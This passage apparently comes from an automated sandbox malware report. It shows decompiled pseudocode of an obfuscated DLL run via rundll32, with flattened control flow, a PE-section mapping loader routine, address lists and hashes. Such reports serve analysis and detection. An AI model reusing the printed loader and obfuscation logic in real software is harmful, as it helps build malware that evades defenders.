									E10018582(_v128, _t462, __eflags, _v140,  &_v52, _v176, _v184);
									_t466 =  &(_t466[4]);
									_t414 = 0x25c5cce0;
									goto L1;
								} else {
									__eflags = _t414 - 0x35acaa76;
									if(_t414 != 0x35acaa76) {
										goto L26;
									} else {
										_push(_t414);
										_t402 = E100157E8(_t461[1]);
										 *_t461 = _t402;
										__eflags = _t402;
										if(__eflags != 0) {
											_t414 = 0x1739e244;
											goto L1;
										}
									}
								}
							}
						}
					}
					goto L29;
					L26:
					__eflags = _t414 - 0xa1cf13b;
				} while (__eflags != 0);
				goto L29;
			}

0x1001469d
0x100146a4
0x100146ab
0x100146ad
0x100146af
0x100146b0
0x100146b5
0x100146bd
0x100146c0
0x100146cd
0x100146d5
0x100146da
0x100146e2
0x100146ed
0x100146f2
0x100146f8
0x10014700
0x10014708
0x10014710
0x10014715
0x1001471d
0x10014725
0x1001472a
0x10014733
0x10014738
0x1001473e
0x10014746
0x10014751
0x10014759
0x10014764
0x1001476c
0x10014774
0x10014779
0x10014781
0x10014789
0x10014791
0x1001479b
0x1001479c
0x100147a0
0x100147a8
0x100147b0
0x100147b5
0x100147bd
0x100147c5
0x100147cd
0x100147d5
0x100147e0
0x100147e4
0x100147ec
0x100147f9
0x100147fd
0x1001480a
0x1001480e
0x10014816
0x10014821
0x1001482c
0x10014837
0x1001483f
0x10014847
0x1001484f
0x1001485c
0x10014868
0x1001486d
0x10014871
0x10014875
0x1001487d
0x1001488d
0x10014893
0x1001489b
0x100148a3
0x100148ab
0x100148b8
0x100148bb
0x100148bf
0x100148c7
0x100148cf
0x100148d7
0x100148df
0x100148ec
0x100148f8
0x100148fc
0x10014904
0x1001490c
0x10014914
0x1001491c
0x10014924
0x1001492c
0x10014934
0x1001493c
0x10014941
0x10014949
0x10014956
0x10014959
0x1001495d
0x10014965
0x10014975
0x10014979
0x10014981
0x10014989
0x1001499b
0x1001499e
0x100149a5
0x100149b0
0x100149b8
0x100149c0
0x100149c8
0x100149d0
0x100149d8
0x100149dd
0x100149e5
0x100149ed
0x100149f5
0x100149fd
0x10014a02
0x10014a07
0x10014a0f
0x10014a1c
0x10014a20
0x10014a25
0x10014a2f
0x10014a37
0x10014a3f
0x10014a4d
0x10014a52
0x10014a56
0x10014a5e
0x10014a66
0x10014a6e
0x10014a7c
0x10014a81
0x10014a85
0x10014a8d
0x10014a95
0x10014a9d
0x10014aa5
0x10014ab4
0x10014ab5
0x10014abe
0x10014ac7
0x10014acb
0x10014ad3
0x10014aee
0x10014af5
0x10014b00
0x10014b0b
0x10014b16
0x10014b21
0x10014b29
0x10014b31
0x10014b39
0x10014b41
0x10014b51
0x10014b55
0x10014b55
0x10014b5d
0x10014b5d
0x10014b5d
0x10014b5d
0x10014b5f
0x00000000
0x00000000
0x10014b65
0x10014c63
0x10014c68
0x10014c6b
0x00000000
0x10014b6b
0x10014b71
0x10014c39
0x10014c3e
0x10014c41
0x00000000
0x10014b77
0x10014b7d
0x10014c12
0x10014c14
0x10014c17
0x00000000
0x10014b83
0x10014b89
0x10014bfc
0x10014c01
0x10014c04
0x00000000
0x10014b8b
0x10014b91
0x10014da3
0x10014b97
0x10014b99
0x10014bd8
0x10014bdb
0x00000000
0x10014b9b
0x10014b9b
0x10014ba1
0x00000000
0x10014ba7
0x10014bc2
0x10014bc7
0x10014bca
0x00000000
0x10014bca
0x10014ba1
0x10014b99
0x10014b91
0x10014b89
0x10014b7d
0x10014b71
0x10014dab
0x10014dad
0x10014db2
0x10014db2
0x10014dbc
0x10014dbc
0x10014c75
0x10014c7b
0x10014d6b
0x10014d70
0x10014d73
0x00000000
0x10014c81
0x10014c81
0x10014c87
0x10014d42
0x10014d47
0x10014d4a
0x00000000
0x10014c8d
0x10014c8d
0x10014c93
0x10014d13
0x10014d18
0x10014d1b
0x00000000
0x10014c95
0x10014c95
0x10014c9b
0x10014ce6
0x10014ceb
0x10014cee
0x00000000
0x10014c9d
0x10014c9d
0x10014ca3
0x00000000
0x10014ca9
0x10014cb1
0x10014cb5
0x10014cba
0x10014cbd
0x10014cbf
0x10014cc5
0x00000000
0x10014cc5
0x10014cbf
0x10014ca3
0x10014c9b
0x10014c93
0x10014c87
0x00000000
0x10014d78
0x10014d78
0x10014d78
0x00000000

Strings

[, xrefs: 1001484F
Ro, xrefs: 1001487D
s*, xrefs: 10014A9D
@d, xrefs: 100148CF
', xrefs: 1001473E
4N, xrefs: 10014981

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: '$4N$@d$Ro$[$s*
API String ID: 0-3977818246
Opcode ID: 8b91073eb68824ad4072f87b60327b0f0f41f15647fb65faca63cf93347245e7
Instruction ID: 07a38d7209349fe1cc0257583510a44f39c41418860415f0518c45196b6dd939
Opcode Fuzzy Hash: 8b91073eb68824ad4072f87b60327b0f0f41f15647fb65faca63cf93347245e7
Instruction Fuzzy Hash: 930214715083818BE364CF24C489A5FFBE2FBC5758F508A1DF29A8A260D7759989CF43

Uniqueness

Uniqueness Score: -1.00%

Function 1001676B, Relevance: 7.7, Strings: 6, Instructions: 223
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E1001676B(intOrPtr __ecx, intOrPtr* __edx) {
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _t209;
				intOrPtr* _t214;
				intOrPtr _t220;
				intOrPtr _t221;
				intOrPtr _t222;
				signed int _t225;
				intOrPtr _t227;
				intOrPtr _t228;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				intOrPtr _t254;
				void* _t256;
				signed int _t257;
				intOrPtr _t258;
				intOrPtr _t259;
				signed int* _t260;

				_t222 = __ecx;
				_t260 =  &_v120;
				_v16 = 0x866cc;
				_v24 = __edx;
				asm("stosd");
				_v36 = _v36 & 0x00000000;
				_t256 = 0x32e15263;
				_v40 = __ecx;
				asm("stosd");
				asm("stosd");
				_v88 = 0x4c86;
				_v88 = _v88 >> 8;
				_v88 = _v88 + 0x4743;
				_v88 = _v88 ^ 0x00006c64;
				_v56 = 0x7209;
				_t249 = 0x2f;
				_v56 = _v56 / _t249;
				_v56 = _v56 ^ 0x00004ba4;
				_v104 = 0x1d35;
				_v104 = _v104 ^ 0x1719f2b3;
				_t250 = 0x70;
				_v104 = _v104 / _t250;
				_v104 = _v104 ^ 0x0034fe7c;
				_v108 = 0x850d;
				_t251 = 0x4b;
				_v108 = _v108 / _t251;
				_v108 = _v108 + 0xffff881b;
				_v108 = _v108 ^ 0xffffc0d4;
				_v76 = 0x9106;
				_v76 = _v76 ^ 0x4d359ade;
				_v76 = _v76 ^ 0x4d353ffa;
				_v100 = 0x5c6a;
				_v100 = _v100 + 0xffffc429;
				_t252 = 0x47;
				_v100 = _v100 / _t252;
				_v100 = _v100 ^ 0x000075a2;
				_v120 = 0xfdde;
				_v120 = _v120 + 0xffff2d79;
				_v120 = _v120 << 8;
				_v120 = _v120 + 0x72a3;
				_v120 = _v120 ^ 0x002bcffe;
				_v68 = 0x65b6;
				_v68 = _v68 ^ 0xa03a7dbc;
				_v68 = _v68 ^ 0xa03a0006;
				_v72 = 0x17a;
				_v72 = _v72 | 0xe4ec8cce;
				_v72 = _v72 ^ 0xe4ecfb88;
				_v96 = 0x4e8;
				_v96 = _v96 + 0x12c;
				_v96 = _v96 * 0x46;
				_v96 = _v96 ^ 0x00018935;
				_v60 = 0xff48;
				_v60 = _v60 | 0x2f82106f;
				_v60 = _v60 ^ 0x2f82b48b;
				_v64 = 0xb5da;
				_v64 = _v64 ^ 0xd090b991;
				_v64 = _v64 ^ 0xd0906a5c;
				_v116 = 0xf7aa;
				_v116 = _v116 >> 0xb;
				_v116 = _v116 + 0x5870;
				_v116 = _v116 << 4;
				_v116 = _v116 ^ 0x000599f3;
				_v92 = 0xc80a;
				_t253 = 0x33;
				_t259 = _v24;
				_t221 = _v24;
				_v92 = _v92 * 0x56;
				_v92 = _v92 + 0x14d;
				_v92 = _v92 ^ 0x004333b4;
				_v112 = 0x930e;
				_v112 = _v112 >> 0xe;
				_t254 = _v20;
				_v112 = _v112 / _t253;
				_v112 = _v112 * 0x2c;
				_v112 = _v112 ^ 0x00000167;
				_v48 = 0x7ef;
				_v48 = _v48 + 0x7f73;
				_v48 = _v48 ^ 0x00009a09;
				_v84 = 0x8c86;
				_v84 = _v84 * 0x14;
				_v84 = _v84 * 0x18;
				_v84 = _v84 ^ 0x01070a49;
				_v52 = 0xdc0;
				_v52 = _v52 | 0x8738231d;
				_v52 = _v52 ^ 0x873814a6;
				_v44 = 0xb7c7;
				_v44 = _v44 | 0xf6a52020;
				_v44 = _v44 ^ 0xf6a5b7e7;
				L1:
				while(1) {
					do {
						while(_t256 != 0x43b6c7f) {
							if(_t256 == 0x2e16d409) {
								_t225 = E1001CD07(_t222, _v104, _v108, _t209,  &_v32, _v76, _t259);
								_t260 =  &(_t260[5]);
								_v36 = _t225;
								if(_t225 == 0) {
									_t257 = _v36;
									L20:
									E100091CD(_v112, _v48, _v84, _t221, _v52);
								} else {
									_t227 = _v32;
									if(_t227 == 0) {
										goto L16;
									} else {
										_v80 = _v80 + _t227;
										_t259 = _t259 - _t227;
										if(_t259 != 0) {
											L10:
											_t209 = _v80;
											L11:
											_t222 = _v40;
											_t256 = 0x2e16d409;
											continue;
										} else {
											_t228 = _t254 + _t254;
											_push(_t228);
											_v28 = _t228;
											_t258 = E100157E8(_t228);
											if(_t258 == 0) {
												goto L16;
											} else {
												E10009970(_v68, _t221, _v72, _t258, _t254, _v96);
												E100091CD(_v60, _v64, _v116, _t221, _v92);
												_t259 = _t254;
												_t220 = _t258 + _t254;
												_t254 = _v28;
												_t260 =  &(_t260[7]);
												_v80 = _t220;
												_t221 = _t258;
												if(_t259 == 0) {
													goto L16;
												} else {
													goto L10;
												}
											}
										}
									}
								}
							} else {
								if(_t256 != 0x32e15263) {
									goto L15;
								} else {
									_t256 = 0x43b6c7f;
									continue;
								}
							}
							L18:
							return _t257;
						}
						_t254 = 0x10000;
						_push(_t222);
						_t209 = E100157E8(0x10000);
						_t221 = _t209;
						if(_t221 == 0) {
							_t222 = _v40;
							_t256 = 0x166bd62c;
							goto L15;
						} else {
							_v80 = _t209;
							_t259 = 0x10000;
							goto L11;
						}
						goto L18;
						L15:
						_t209 = _v80;
					} while (_t256 != 0x166bd62c);
					L16:
					_t257 = _v36;
					if(_t257 == 0) {
						goto L20;
					} else {
						_t214 = _v24;
						 *_t214 = _t221;
						 *((intOrPtr*)(_t214 + 4)) = _t254 - _t259;
					}
					goto L18;
				}
			}

0x1001676b
0x1001676b
0x1001676e
0x10016780
0x10016784
0x10016789
0x1001678e
0x10016793
0x10016797
0x10016798
0x10016799
0x100167a1
0x100167a6
0x100167ae
0x100167b6
0x100167c2
0x100167c7
0x100167cd
0x100167d5
0x100167dd
0x100167e9
0x100167ee
0x100167f4
0x100167fc
0x10016808
0x1001680d
0x10016813
0x1001681b
0x10016823
0x1001682b
0x10016833
0x1001683b
0x10016843
0x1001684f
0x10016852
0x10016856
0x1001685e
0x10016866
0x1001686e
0x10016873
0x1001687b
0x10016883
0x1001688b
0x10016893
0x1001689b
0x100168a3
0x100168ab
0x100168b3
0x100168bb
0x100168c8
0x100168cc
0x100168d4
0x100168dc
0x100168e4
0x100168ec
0x100168f4
0x100168fc
0x10016904
0x1001690c
0x10016911
0x10016919
0x10016920
0x10016928
0x10016937
0x10016938
0x1001693c
0x10016940
0x10016944
0x1001694c
0x10016954
0x1001695c
0x10016967
0x1001696b
0x10016974
0x10016978
0x10016980
0x10016988
0x10016990
0x10016998
0x100169a5
0x100169ae
0x100169b2
0x100169be
0x100169c6
0x100169ce
0x100169d6
0x100169de
0x100169e6
0x00000000
0x100169ee
0x100169ee
0x100169ee
0x10016a00
0x10016a2d
0x10016a2f
0x10016a32
0x10016a38
0x10016b22
0x10016b26
0x10016b37
0x10016a3e
0x10016a3e
0x10016a44
0x00000000
0x10016a4a
0x10016a4a
0x10016a4e
0x10016a50
0x10016ab6
0x10016ab6
0x10016aba
0x10016aba
0x10016abe
0x00000000
0x10016a52
0x10016a56
0x10016a5d
0x10016a5e
0x10016a67
0x10016a6c
0x00000000
0x10016a72
0x10016a82
0x10016a98
0x10016a9d
0x10016a9f
0x10016aa2
0x10016aa9
0x10016aac
0x10016ab0
0x10016ab4
0x00000000
0x00000000
0x00000000
0x00000000
0x10016ab4
0x10016a6c
0x10016a50
0x10016a44
0x10016a02
0x10016a08
0x00000000
0x10016a0e
0x10016a0e
0x00000000
0x10016a0e
0x10016a08
0x10016b19
0x10016b21
0x10016b21
0x10016acc
0x10016ad5
0x10016ad8
0x10016add
0x10016ae2
0x10016aec
0x10016af0
0x00000000
0x10016ae4
0x10016ae4
0x10016ae8
0x00000000
0x10016ae8
0x00000000
0x10016af5
0x10016af5
0x10016af9
0x10016b05
0x10016b05
0x10016b0b
0x00000000
0x10016b0d
0x10016b0d
0x10016b13
0x10016b15
0x10016b15
0x00000000
0x10016b0b

Strings

j\, xrefs: 1001683B
cR2, xrefs: 1001678E
dl, xrefs: 100167AE
r, xrefs: 100167B6
cR2, xrefs: 10016A02
pX, xrefs: 10016911

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: r$cR2$cR2$dl$j\$pX
API String ID: 0-1990883307
Opcode ID: 5afea401a38fb3ed9ab9e3cfea92ea9d8ff477060cd6098b2c0c0ba7b7ad2f6f
Instruction ID: abaabab29ae1ed465508f17d184fa830ec2d5e61d89a70c706a4c59ec083da4e
Opcode Fuzzy Hash: 5afea401a38fb3ed9ab9e3cfea92ea9d8ff477060cd6098b2c0c0ba7b7ad2f6f
Instruction Fuzzy Hash: 49A130B19093819BD354CF25C98580BFBE1FBC8798F108A2DF5959A260C3B5DA49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 10005BE1, Relevance: 7.7, Strings: 6, Instructions: 172
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E10005BE1(void* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* _t161;
				void* _t180;
				void* _t190;
				void* _t192;
				signed int _t194;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				void* _t227;
				void* _t232;
				intOrPtr* _t234;
				signed int* _t236;
				signed int* _t237;
				signed int* _t238;

				_push(_a8);
				_t234 = __edx;
				_push(0);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t161);
				_v16 = 0x1b4e;
				_v16 = _v16 ^ 0xc2117ce7;
				_v16 = _v16 ^ 0xc21177a9;
				_v20 = 0x4ee4;
				_t194 = 0x69;
				_v20 = _v20 / _t194;
				_v20 = _v20 ^ 0x000020c0;
				_v28 = 0x719b;
				_v28 = _v28 + 0x9810;
				_v28 = _v28 ^ 0x00016243;
				_v36 = 0xcf79;
				_v36 = _v36 << 4;
				_v36 = _v36 + 0x818a;
				_v36 = _v36 ^ 0x000d705e;
				_v40 = 0x5a4d;
				_v40 = _v40 + 0x4c3f;
				_t195 = 0x28;
				_v40 = _v40 * 0x4c;
				_v40 = _v40 ^ 0x0031666b;
				_v64 = 0x8d9a;
				_v64 = _v64 / _t195;
				_t196 = 0x5f;
				_v64 = _v64 / _t196;
				_t197 = 0x63;
				_v64 = _v64 * 0x23;
				_v64 = _v64 ^ 0x000027a7;
				_v12 = 0x746d;
				_v12 = _v12 / _t197;
				_v12 = _v12 ^ 0x00006093;
				_v60 = 0x2db8;
				_v60 = _v60 | 0xa376fc52;
				_v60 = _v60 >> 8;
				_v60 = _v60 ^ 0x00a31548;
				_v24 = 0xbe89;
				_v24 = _v24 + 0xfffffabc;
				_v24 = _v24 ^ 0x0000f7c2;
				_v48 = 0x7924;
				_v48 = _v48 + 0x8930;
				_t198 = 0x7b;
				_v48 = _v48 * 0x60;
				_v48 = _v48 << 0xb;
				_v48 = _v48 ^ 0x06fc5745;
				_v52 = 0x6da;
				_v52 = _v52 / _t198;
				_v52 = _v52 >> 2;
				_v52 = _v52 + 0xffffc306;
				_v52 = _v52 ^ 0xffffa7a2;
				_v32 = 0xa776;
				_v32 = _v32 << 0xb;
				_v32 = _v32 ^ 0x9264e448;
				_v32 = _v32 ^ 0x975f0f13;
				_v4 = 0x5f13;
				_v4 = _v4 >> 2;
				_v4 = _v4 ^ 0x00006c09;
				_v8 = 0xd9b4;
				_t199 = 0x7d;
				_v8 = _v8 / _t199;
				_v8 = _v8 ^ 0x00001d23;
				_v44 = 0xe400;
				_v44 = _v44 | 0xbfff2ffd;
				_t200 = 3;
				_v44 = _v44 / _t200;
				_v44 = _v44 ^ 0x3fffd239;
				_v56 = 0xf54;
				_v56 = _v56 + 0xffffced3;
				_v56 = _v56 + 0x8d94;
				_v56 = _v56 ^ 0xc5d6359f;
				_v56 = _v56 ^ 0xc5d65e64;
				_t180 = E100073F9(_v28, _v36, _v40, _v64, __edx);
				_t190 = _t180;
				_t236 =  &(( &_v64)[7]);
				if(_t190 != 0) {
					_t227 = E1000204B(_v56, _v12,  *((intOrPtr*)(_t190 + 0x50)), _v20 | _v16, _v60, _v24);
					_t237 =  &(_t236[5]);
					if(_t227 == 0) {
						L6:
						return _t227;
					}
					E10009970(_v48,  *_t234, _v52, _t227,  *((intOrPtr*)(_t190 + 0x54)), _v32);
					_t238 =  &(_t237[4]);
					_t232 = ( *(_t190 + 0x14) & 0x0000ffff) + 0x18 + _t190;
					_t192 = ( *(_t190 + 6) & 0x0000ffff) * 0x28 + _t232;
					while(_t232 < _t192) {
						_t188 =  <  ?  *((void*)(_t232 + 8)) :  *((intOrPtr*)(_t232 + 0x10));
						E10009970(_v4,  *((intOrPtr*)(_t232 + 0x14)) +  *_t234, _v8,  *((intOrPtr*)(_t232 + 0xc)) + _t227,  <  ?  *((void*)(_t232 + 8)) :  *((intOrPtr*)(_t232 + 0x10)), _v44);
						_t238 =  &(_t238[4]);
						_t232 = _t232 + 0x28;
					}
					goto L6;
				}
				return _t180;
			}

0x10005be6
0x10005bea
0x10005bec
0x10005bee
0x10005bef
0x10005bf0
0x10005bf5
0x10005bff
0x10005c07
0x10005c0f
0x10005c1d
0x10005c22
0x10005c28
0x10005c30
0x10005c38
0x10005c40
0x10005c48
0x10005c50
0x10005c55
0x10005c5d
0x10005c65
0x10005c6d
0x10005c7a
0x10005c7d
0x10005c81
0x10005c89
0x10005c99
0x10005ca1
0x10005ca6
0x10005cb1
0x10005cb4
0x10005cb8
0x10005cc0
0x10005cd0
0x10005cd4
0x10005cdc
0x10005ce4
0x10005cec
0x10005cf1
0x10005cf9
0x10005d01
0x10005d09
0x10005d11
0x10005d19
0x10005d26
0x10005d27
0x10005d2b
0x10005d30
0x10005d38
0x10005d46
0x10005d4a
0x10005d4f
0x10005d57
0x10005d5f
0x10005d67
0x10005d6c
0x10005d74
0x10005d7e
0x10005d86
0x10005d8b
0x10005d93
0x10005da1
0x10005da6
0x10005dac
0x10005db4
0x10005dbc
0x10005dc8
0x10005dcc
0x10005dd0
0x10005dd8
0x10005de0
0x10005de8
0x10005df0
0x10005df8
0x10005e10
0x10005e15
0x10005e17
0x10005e1c
0x10005e44
0x10005e46
0x10005e4b
0x10005eb0
0x00000000
0x10005eb2
0x10005e61
0x10005e6a
0x10005e74
0x10005e79
0x10005eab
0x10005e92
0x10005ea0
0x10005ea5
0x10005ea8
0x10005ea8
0x00000000
0x10005eaf
0x10005eb8

Strings

l, xrefs: 10005D8B
N, xrefs: 10005C0F
^p, xrefs: 10005C5D
kf1, xrefs: 10005C81
$y, xrefs: 10005D11
mt, xrefs: 10005CC0

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: l$$y$^p$kf1$mt$N
API String ID: 0-2826323611
Opcode ID: 990bd43fce18d13703470070e4ea28ead3db5627c1d4020e323a10ed1f143b64
Instruction ID: b087b2a7bdd9e8b1e5a607b88e6e493accb252ae43d71ee7b54195949d735030
Opcode Fuzzy Hash: 990bd43fce18d13703470070e4ea28ead3db5627c1d4020e323a10ed1f143b64
Instruction Fuzzy Hash: 947124715093409BE358CF65C98991BFBF2FBC4758F008A1DF589862A0D7B6D945CF42

Uniqueness

Uniqueness Score: -1.00%

Function 10005856, Relevance: 7.7, Strings: 6, Instructions: 168
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10005856(void* __ecx, void* __edi, void* __eflags) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				unsigned int _v56;
				signed int _v60;
				signed int _v64;
				signed int _t207;
				signed int _t209;
				int _t213;
				void* _t216;
				signed int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t233;
				void* _t262;
				void* _t266;
				signed int _t268;

				_v20 = 0xe5e9;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x000072fc;
				_v60 = 0xeee;
				_t266 = __ecx;
				_t219 = 0xb;
				_v60 = _v60 / _t219;
				_t220 = 0x2d;
				_v60 = _v60 / _t220;
				_v60 = _v60 << 0xa;
				_v60 = _v60 ^ 0x00001c10;
				_v36 = 0x52f6;
				_v36 = _v36 ^ 0x4f1b66f5;
				_t221 = 0x42;
				_v36 = _v36 * 0x69;
				_v36 = _v36 ^ 0x72285533;
				_v12 = 0x9a21;
				_v12 = _v12 | 0x390e9e30;
				_v12 = _v12 ^ 0x390e9e21;
				_v64 = 0x3c55;
				_v64 = _v64 / _t221;
				_v64 = _v64 + 0xffff9cac;
				_v64 = _v64 << 2;
				_v64 = _v64 ^ 0xfffe1a99;
				_v44 = 0xe171;
				_v44 = _v44 | 0xc7bc5698;
				_t222 = 0x66;
				_v44 = _v44 / _t222;
				_v44 = _v44 ^ 0x01f52ba1;
				_v40 = 0x30e3;
				_v40 = _v40 ^ 0xbd01c268;
				_v40 = _v40 ^ 0x5fce1aa6;
				_v40 = _v40 ^ 0xe2cffd7a;
				_v24 = 0x83cc;
				_t223 = 0x5f;
				_v24 = _v24 / _t223;
				_v24 = _v24 ^ 0x00004c9a;
				_v56 = 0x8dff;
				_t224 = 0x7e;
				_v56 = _v56 / _t224;
				_v56 = _v56 | 0x1e081a33;
				_v56 = _v56 >> 0xa;
				_v56 = _v56 ^ 0x0007b8c6;
				_v16 = 0x76f3;
				_t225 = 0x52;
				_v16 = _v16 / _t225;
				_v16 = _v16 ^ 0x00007e48;
				_v48 = 0xd814;
				_t226 = 0x1a;
				_v48 = _v48 / _t226;
				_v48 = _v48 >> 5;
				_v48 = _v48 | 0x7e8c2f48;
				_v48 = _v48 ^ 0x7e8c1b4f;
				_v28 = 0x13ee;
				_t227 = 0x75;
				_v28 = _v28 / _t227;
				_v28 = _v28 + 0xffff1a4e;
				_v28 = _v28 ^ 0xffff6e25;
				_v8 = 0x2381;
				_v8 = _v8 + 0xffff7415;
				_v8 = _v8 ^ 0xffffaad1;
				_v32 = 0x9c03;
				_t228 = 0x2a;
				_v32 = _v32 / _t228;
				_v32 = _v32 >> 4;
				_v32 = _v32 ^ 0x00002dee;
				_v52 = 0xdc3f;
				_v52 = _v52 >> 0xb;
				_v52 = _v52 ^ 0xda865163;
				_v52 = _v52 * 0x7a;
				_v52 = _v52 ^ 0x2402d330;
				_v4 = E10017B6B();
				_t216 = _v20 + E10017B6B() % _v60;
				_t207 = E10017B6B();
				_t209 = _v52;
				_t268 = _v36 + _t207 % _v12;
				if(_t209 < _t216) {
					_t217 = _t216 - _t209;
					_t262 = _t266;
					_t233 = _t217 >> 1;
					_t213 = memset(_t262, 0x2d002d, _t233 << 2);
					asm("adc ecx, ecx");
					_t266 = _t266 + _t217 * 2;
					memset(_t262 + _t233, _t213, 0);
				}
				E100060DA( &_v4, _v48, 3, _t268, _v28, _v8, _v32, _t266);
				 *((short*)(_t266 + _t268 * 2)) = 0;
				return 0;
			}

0x10005859
0x10005863
0x10005867
0x1000586f
0x10005880
0x10005882
0x10005887
0x10005891
0x10005896
0x1000589c
0x100058a1
0x100058a9
0x100058b1
0x100058be
0x100058c1
0x100058c5
0x100058cd
0x100058d5
0x100058dd
0x100058e5
0x100058f5
0x100058f9
0x10005901
0x10005906
0x1000590e
0x10005916
0x10005922
0x10005927
0x1000592d
0x10005935
0x1000593d
0x10005945
0x1000594d
0x10005955
0x10005961
0x10005966
0x1000596c
0x10005974
0x10005980
0x10005985
0x1000598b
0x10005993
0x10005998
0x100059a0
0x100059ac
0x100059af
0x100059b3
0x100059bb
0x100059cb
0x100059d0
0x100059d6
0x100059db
0x100059e3
0x100059eb
0x100059f7
0x100059fc
0x10005a02
0x10005a0a
0x10005a12
0x10005a1a
0x10005a22
0x10005a2a
0x10005a36
0x10005a39
0x10005a3d
0x10005a42
0x10005a4a
0x10005a52
0x10005a57
0x10005a64
0x10005a68
0x10005a7d
0x10005a9e
0x10005aa4
0x10005ab5
0x10005ab9
0x10005abd
0x10005abf
0x10005ac9
0x10005acb
0x10005acd
0x10005acf
0x10005ad1
0x10005ad4
0x10005ad7
0x10005af0
0x10005afa
0x10005b04

Strings

q, xrefs: 1000590E
3U(r, xrefs: 100058C5
U<, xrefs: 100058E5
H~, xrefs: 100059B3
-, xrefs: 10005A42
0, xrefs: 10005935

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 3U(r$H~$U<$q$-$0
API String ID: 0-112106996
Opcode ID: a14db494ac1d1924fb546390b44814837310fb5a009353283d47587c83f43a78
Instruction ID: f4907ee1585d44d3942ec58e3a4e8cb82ff1253e3bf876b76615309baba7f8ab
Opcode Fuzzy Hash: a14db494ac1d1924fb546390b44814837310fb5a009353283d47587c83f43a78
Instruction Fuzzy Hash: 037134716083419FE348CF25D88A50BBBF2FBC8748F10891DF1999A2A0D7B5DA598F46

Uniqueness

Uniqueness Score: -1.00%

Function 10004BDE, Relevance: 7.7, Strings: 6, Instructions: 158
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E10004BDE(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _t127;
				intOrPtr _t142;
				void* _t145;
				void* _t148;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				void* _t169;
				signed int* _t172;

				_push(_a20);
				_push(1);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(1);
				E100056B2(_t127);
				_v24 = 0x41a5;
				_t172 =  &(( &_v60)[7]);
				_v24 = _v24 + 0x21bb;
				_v24 = _v24 ^ 0x00007358;
				_t169 = 0;
				_v28 = 0x71a;
				_t148 = 0xfead4ff;
				_t164 = 0x12;
				_v28 = _v28 * 0x28;
				_v28 = _v28 ^ 0x00016495;
				_v32 = 0xbf26;
				_v32 = _v32 + 0xffff8b18;
				_v32 = _v32 ^ 0x000031b7;
				_v36 = 0x25da;
				_v36 = _v36 ^ 0x27b288f9;
				_v36 = _v36 ^ 0x27b2aeec;
				_v56 = 0xc86;
				_v56 = _v56 * 0x14;
				_v56 = _v56 / _t164;
				_v56 = _v56 | 0x1dd3be64;
				_v56 = _v56 ^ 0x1dd38503;
